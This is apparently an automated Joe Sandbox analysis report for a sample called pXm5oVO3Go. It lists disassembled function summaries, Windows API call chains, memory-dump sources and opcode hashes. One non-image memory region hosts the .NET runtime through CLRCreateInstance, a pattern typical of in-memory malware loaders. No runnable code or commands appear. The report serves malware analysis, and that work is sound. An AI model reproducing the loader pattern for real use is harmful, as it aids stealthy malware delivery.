                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1615890066-4289949731
                                  • Opcode ID: 0e9a4391b2991cbb6a130a05588d582def284d2fc4114e38a9ee751e6891da86
                                  • Instruction ID: e808f1c6e905dae4937ea79d9719188c59fe702de034b9e396e897d93512bda5
                                  • Opcode Fuzzy Hash: 0e9a4391b2991cbb6a130a05588d582def284d2fc4114e38a9ee751e6891da86
                                  • Instruction Fuzzy Hash: 4D31B4333002148BD7209A5CE880A6EF3AAEBA1765F21063FF951DB2E1C7759C4087E9
                                  APIs
                                  • DeleteCriticalSection.KERNEL32(0073EFB8,ED2F953D), ref: 0040372B
                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00403751
                                    • Part of subcall function 00403770: EnterCriticalSection.KERNEL32(0073EFB8,ED2F953D,?,?,?,?,?,?,00000000,0067E880,000000FF,?,00403623,0000000E), ref: 004037B0
                                    • Part of subcall function 00403770: LeaveCriticalSection.KERNEL32(?), ref: 0040387B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CriticalSection$DeleteEnterIos_base_dtorLeavestd::ios_base::_
                                  • String ID: --------------------------------------$Close the log file$ps
                                  • API String ID: 116376633-1934898415
                                  • Opcode ID: 9fbfd5a8eb769af68ec267b9150065a5c97c4332b75b4e6040aa01bb64254486
                                  • Instruction ID: 2ecc6842cfc27d3fb62b39c050e3c8f357bb2fe6eebd545a536de204dcc3158d
                                  • Opcode Fuzzy Hash: 9fbfd5a8eb769af68ec267b9150065a5c97c4332b75b4e6040aa01bb64254486
                                  • Instruction Fuzzy Hash: C8113AB0A04209EFE740DF55DC45B1DBBA9EB4471AF00463FF514A73C1DBBC99048A19
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004021EF
                                  • std::exception::exception.LIBCMT ref: 00402228
                                    • Part of subcall function 00638987: std::exception::_Copy_str.LIBCMT ref: 006389A2
                                  • __CxxThrowException@8.LIBCMT ref: 0040223D
                                    • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,ED2F953D,006FC518,00401FC3,?,0071C220,?,ED2F953D), ref: 00641CCB
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00402244
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                  • String ID: bad locale name
                                  • API String ID: 73090415-1405518554
                                  • Opcode ID: e444c0e42f906dcbddc2727c2d64d1d77e0876490b577f2cd922582846f8c114
                                  • Instruction ID: 30edfebacd864dae4cba8a7ac67a3145ff47352efdd4f303b8bcfa43c8e20d87
                                  • Opcode Fuzzy Hash: e444c0e42f906dcbddc2727c2d64d1d77e0876490b577f2cd922582846f8c114
                                  • Instruction Fuzzy Hash: 7E11E2B1804788EFC710CF99C880AAAFBF8FB14300F408A6FF45593640D774A608CBA9
                                  APIs
                                  • InterlockedExchange.KERNEL32(0073EA24,00000000), ref: 00425303
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00425315
                                  • SelectObject.GDI32(00000000,?), ref: 00425323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CompatibleCreateExchangeInterlockedObjectSelect
                                  • String ID: $s$4s
                                  • API String ID: 3535841225-2355125407
                                  • Opcode ID: af39fbe5fe79b01b79704621441017bdfe42500967b292a18b7a69577aee8cc6
                                  • Instruction ID: a008aa4b5d13991f7c075ac082593537b6fc1bb36f1273c765e7a505121c0516
                                  • Opcode Fuzzy Hash: af39fbe5fe79b01b79704621441017bdfe42500967b292a18b7a69577aee8cc6
                                  • Instruction Fuzzy Hash: CEF08972910A12BBD710CB59FC547A6B3E9FB0C321F941226E908D3510D774F8508794
                                  APIs
                                  • SelectObject.GDI32(?,?), ref: 00425352
                                  • InterlockedExchange.KERNEL32(0073EA24,?), ref: 00425368
                                  • DeleteDC.GDI32(00000000), ref: 0042537A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: DeleteExchangeInterlockedObjectSelect
                                  • String ID: $s$4s
                                  • API String ID: 3299122373-2355125407
                                  • Opcode ID: 792cba1ebb77e0113482869a1f5ac12fb08f8581ba4ba3c309dfc212fdb726b8
                                  • Instruction ID: 3b2aef00af78a40e224edbe4aca8cb49a209f71b646a823499b486a80b901ec0
                                  • Opcode Fuzzy Hash: 792cba1ebb77e0113482869a1f5ac12fb08f8581ba4ba3c309dfc212fdb726b8
                                  • Instruction Fuzzy Hash: CEE065B2600110ABDB149F59FC8CDA777ACFB483A47512266EC08D7316D775DC40CBA4
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 036436F8
                                  • CLRCreateInstance.MSCOREE(1001A868,1001A858,?), ref: 03643712
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 03643816
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 03643845
                                  • SysAllocString.OLEAUT32(?), ref: 036438F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                  • String ID:
                                  • API String ID: 3666180938-0
                                  • Opcode ID: 0301c89c22ac4d9c38c143e6132587ca97202c0f191c60d530997892f8b3a8a7
                                  • Instruction ID: 024b56e2bc7086654a94fc92d5540d5c8b6ca19f8f9d041a57a929079d18c07c
                                  • Opcode Fuzzy Hash: 0301c89c22ac4d9c38c143e6132587ca97202c0f191c60d530997892f8b3a8a7
                                  • Instruction Fuzzy Hash: BAA105B5E00249AFDB00DFE4CD889AEBBB9FF49304F64456DE205EB251D7319A46CB50
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 100036F4
                                  • CLRCreateInstance.MSCOREE(1001A868,1001A858,?), ref: 1000370E
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 10003812
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 10003841
                                  • SysAllocString.OLEAUT32(?), ref: 100038F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                  • String ID:
                                  • API String ID: 3666180938-0
                                  • Opcode ID: 0301c89c22ac4d9c38c143e6132587ca97202c0f191c60d530997892f8b3a8a7
                                  • Instruction ID: 4c23db85811c87e403490fbd8194970e45e724dfb527cc97901a904ff1b24d94
                                  • Opcode Fuzzy Hash: 0301c89c22ac4d9c38c143e6132587ca97202c0f191c60d530997892f8b3a8a7
                                  • Instruction Fuzzy Hash: A6A14AB1E00249AFEB01CFE4CC889AEBBB9FF49344F508469E209EB251C7719D46CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memmove_memset
                                  • String ID:
                                  • API String ID: 3555123492-0
                                  • Opcode ID: 764befa4bf2e314dd1f73a8c7f2d56884837161f691c1f005e55797678d8d090
                                  • Instruction ID: 8639b30e83a7fb94bc972bc6e8a9cd534288a9ebbad313e0c7a912072ab93095
                                  • Opcode Fuzzy Hash: 764befa4bf2e314dd1f73a8c7f2d56884837161f691c1f005e55797678d8d090
                                  • Instruction Fuzzy Hash: 67412B36A00608ABD720CF58D882AEBF799EF95314F14456FEC49C7301E6B6E994C394
                                  APIs
                                  • _malloc.LIBCMT ref: 03653FF8
                                    • Part of subcall function 0364B4CF: __FF_MSGBANNER.LIBCMT ref: 0364B4E8
                                    • Part of subcall function 0364B4CF: __NMSG_WRITE.LIBCMT ref: 0364B4EF
                                    • Part of subcall function 0364B4CF: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0364B514
                                  • _free.LIBCMT ref: 0365400B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID:
                                  • API String ID: 1020059152-0
                                  • Opcode ID: 81d65614e0b6db376356ac8b77cde15ec8576bf147855c74108ac56880b648b2
                                  • Instruction ID: 0d1b4b92bc1ea0e09a893ad7aae7928f22e741d4ca866384b747dbf65e55ff3a
                                  • Opcode Fuzzy Hash: 81d65614e0b6db376356ac8b77cde15ec8576bf147855c74108ac56880b648b2
                                  • Instruction Fuzzy Hash: E111C437C04714ABCB23EB75AC04A993B69AF842A4F3444BDFC498F250DE34C5C28754
                                  APIs
                                  • _malloc.LIBCMT ref: 10013FF4
                                    • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                    • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                    • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                  • _free.LIBCMT ref: 10014007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID:
                                  • API String ID: 1020059152-0
                                  • Opcode ID: 1ab232e044aed3252399bea0ee6c793a0e290cd9f57a7279a257bb48d984a3d0
                                  • Instruction ID: 70ff08b1941979eeaa78273ecc160b3e30a6ac04d156f3026e39b441a1728ba6
                                  • Opcode Fuzzy Hash: 1ab232e044aed3252399bea0ee6c793a0e290cd9f57a7279a257bb48d984a3d0
                                  • Instruction Fuzzy Hash: 67119836804625ABEB23EF75980565D37A4EF482F0B234426FE589E1A1DF34D98157A0
                                  APIs
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004022A2
                                    • Part of subcall function 0065C042: _setlocale.LIBCMT ref: 0065C054
                                  • _free.LIBCMT ref: 004022B4
                                    • Part of subcall function 00638E31: HeapFree.KERNEL32(00000000,00000000,?,0040201B,?,ED2F953D), ref: 00638E47
                                  • _free.LIBCMT ref: 004022C7
                                  • _free.LIBCMT ref: 004022DA
                                  • _free.LIBCMT ref: 004022ED
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free$FreeHeapLocinfo::_Locinfo_dtor_setlocalestd::_
                                  • String ID:
                                  • API String ID: 1034197179-0
                                  • Opcode ID: ac469826c7b5778c2480ed9d8d21304f84577ce16e330bacff609af96e54664c
                                  • Instruction ID: ed5dcfbf73a07c69821e4bf8393dc523f7ba6170a8c7996168ef0bd254403016
                                  • Opcode Fuzzy Hash: ac469826c7b5778c2480ed9d8d21304f84577ce16e330bacff609af96e54664c
                                  • Instruction Fuzzy Hash: 3B1190B1900700AFCA20DF599D45A5BF7EAEB40710F144A2EF416D3780E7B5ED048A95
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,03642558,00000001,00000000,00000000,?,?,036416AA,?,00000004,03642558), ref: 0364ABAF
                                  • _free.LIBCMT ref: 0364ABC2
                                  • GetLastError.KERNEL32(?,?,036416AA,?,00000004,03642558), ref: 0364ABCA
                                  • SysAllocString.OLEAUT32(00000000), ref: 0364ABE5
                                  • _free.LIBCMT ref: 0364ABF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                  • String ID:
                                  • API String ID: 3133011222-0
                                  • Opcode ID: f107383aaf685e7376f7e261de874eec1cef4eb26a884c931bf4a37c31d62274
                                  • Instruction ID: 4c195260b726e2754c0e3d76cd775c05de1b88e451184cfa31717bfd530753b4
                                  • Opcode Fuzzy Hash: f107383aaf685e7376f7e261de874eec1cef4eb26a884c931bf4a37c31d62274
                                  • Instruction Fuzzy Hash: B011E9B6D40308BBDB10EFE4CD85BAEB779EF48261F14413DE906BB240DA38D5408764
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000ABAB
                                  • _free.LIBCMT ref: 1000ABBE
                                  • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000ABC6
                                  • SysAllocString.OLEAUT32(00000000), ref: 1000ABE1
                                  • _free.LIBCMT ref: 1000ABF2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                  • String ID:
                                  • API String ID: 3133011222-0
                                  • Opcode ID: c1eece032195694a8002d5fb2468b5fdb935dc54d1e59116945ad4e093ffb3a7
                                  • Instruction ID: d1de8894a8780e0054a3ce0d446c8da7c10fb7330143512198e40d387101a589
                                  • Opcode Fuzzy Hash: c1eece032195694a8002d5fb2468b5fdb935dc54d1e59116945ad4e093ffb3a7
                                  • Instruction Fuzzy Hash: 1611E977D00219ABF710DFA08C82F9EB765EF592E1F114239FC06B7246E678FA808651
                                  APIs
                                  • FindResourceW.KERNEL32(?,?,75756BA0,00000000,006DDE54,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000), ref: 005A0D63
                                  • LoadResource.KERNEL32(?,00000000,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014,0059BAC9,00000004), ref: 005A0D79
                                  • LockResource.KERNEL32(00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014,0059BAC9,00000004), ref: 005A0D88
                                  • FreeResource.KERNEL32(?,00000000,00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014), ref: 005A0D99
                                  • SizeofResource.KERNEL32(?,00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A,00000000,00000014,0059BAC9), ref: 005A0DA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Resource$FindFreeLoadLockSizeof
                                  • String ID:
                                  • API String ID: 4159136517-0
                                  • Opcode ID: 060403b0df980fa2bc26eddb00098e55fd3a1d70780271815c09f747c1f5bba0
                                  • Instruction ID: bf9dffb8b0351f1a12464e4b0dfc8b530dce4cae73df35a4009b91ad96d594c9
                                  • Opcode Fuzzy Hash: 060403b0df980fa2bc26eddb00098e55fd3a1d70780271815c09f747c1f5bba0
                                  • Instruction Fuzzy Hash: 7F017C3B510A22BB8B215BA59C5889F7FADFF86764705A114F90593250EA30ED008BA0
                                  APIs
                                  • __CreateFrameInfo.LIBCMT ref: 03650E4A
                                    • Part of subcall function 0364CA1F: __getptd.LIBCMT ref: 0364CA2D
                                    • Part of subcall function 0364CA1F: __getptd.LIBCMT ref: 0364CA3B
                                  • __getptd.LIBCMT ref: 03650E54
                                    • Part of subcall function 0364EA0D: __getptd_noexit.LIBCMT ref: 0364EA10
                                    • Part of subcall function 0364EA0D: __amsg_exit.LIBCMT ref: 0364EA1D
                                  • __getptd.LIBCMT ref: 03650E62
                                  • __getptd.LIBCMT ref: 03650E70
                                  • __getptd.LIBCMT ref: 03650E7B
                                    • Part of subcall function 0364CAC4: __CallSettingFrame@12.LIBCMT ref: 0364CB10
                                    • Part of subcall function 03650F48: __getptd.LIBCMT ref: 03650F57
                                    • Part of subcall function 03650F48: __getptd.LIBCMT ref: 03650F65
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                  • String ID:
                                  • API String ID: 3282538202-0
                                  • Opcode ID: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                  • Instruction ID: 9e777d058709a66ab772dbbb5b9fb8c3e1f254bec6c077daa7b4cabe7cb1bda7
                                  • Opcode Fuzzy Hash: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                  • Instruction Fuzzy Hash: FD11E6B5C00349EFDF00EFA4D948AED7BB1FF08314F108069E814AB251DB799A519F58
                                  APIs
                                  • __CreateFrameInfo.LIBCMT ref: 10010E46
                                    • Part of subcall function 1000CA1B: __getptd.LIBCMT ref: 1000CA29
                                    • Part of subcall function 1000CA1B: __getptd.LIBCMT ref: 1000CA37
                                  • __getptd.LIBCMT ref: 10010E50
                                    • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                    • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                  • __getptd.LIBCMT ref: 10010E5E
                                  • __getptd.LIBCMT ref: 10010E6C
                                  • __getptd.LIBCMT ref: 10010E77
                                    • Part of subcall function 1000CAC0: __CallSettingFrame@12.LIBCMT ref: 1000CB0C
                                    • Part of subcall function 10010F44: __getptd.LIBCMT ref: 10010F53
                                    • Part of subcall function 10010F44: __getptd.LIBCMT ref: 10010F61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                  • String ID:
                                  • API String ID: 3282538202-0
                                  • Opcode ID: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                  • Instruction ID: 5e55d5e3cdc97a5d851e944c1f85551ef15e2c34282e0f19f6d61ff914aafdfd
                                  • Opcode Fuzzy Hash: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                  • Instruction Fuzzy Hash: 1A1119B5D00249DFEF00DFA4D446AEE7BB0FF48354F10806AF814AB252DB78AA519F51
                                  APIs
                                  • GetModuleHandleW.KERNEL32(100189E4,1001D2B0,00000008,0364E9E8,00000000,00000000,?,?,0364DDFC,0364B4BB,?,?,0364B068,?,?,03641020), ref: 0364E8F1
                                  • __lock.LIBCMT ref: 0364E925
                                    • Part of subcall function 0364F7D6: __mtinitlocknum.LIBCMT ref: 0364F7EC
                                    • Part of subcall function 0364F7D6: __amsg_exit.LIBCMT ref: 0364F7F8
                                    • Part of subcall function 0364F7D6: RtlEnterCriticalSection.NTDLL(00000000), ref: 0364F800
                                  • InterlockedIncrement.KERNEL32(?), ref: 0364E932
                                  • __lock.LIBCMT ref: 0364E946
                                  • ___addlocaleref.LIBCMT ref: 0364E964
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID:
                                  • API String ID: 637971194-0
                                  • Opcode ID: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                  • Instruction ID: 2a811599388bd926fc00bae7a3aec76b38ec781b17170bc7c6f9b12aed1063b9
                                  • Opcode Fuzzy Hash: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                  • Instruction Fuzzy Hash: 63015B75804B00EAE720EF65D944749BBE0FF50320F10890EE49A5B7A0CBB9EA40CB15
                                  APIs
                                  • GetModuleHandleW.KERNEL32(100189E4,1001D2B0,00000008,1000E9E4,00000000,00000000,?,?,1000DDF8,1000B4B7,?,?,1000B064,?,?,1000101C), ref: 1000E8ED
                                  • __lock.LIBCMT ref: 1000E921
                                    • Part of subcall function 1000F7D2: __mtinitlocknum.LIBCMT ref: 1000F7E8
                                    • Part of subcall function 1000F7D2: __amsg_exit.LIBCMT ref: 1000F7F4
                                    • Part of subcall function 1000F7D2: RtlEnterCriticalSection.NTDLL(00000000), ref: 1000F7FC
                                  • InterlockedIncrement.KERNEL32(?), ref: 1000E92E
                                  • __lock.LIBCMT ref: 1000E942
                                  • ___addlocaleref.LIBCMT ref: 1000E960
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID:
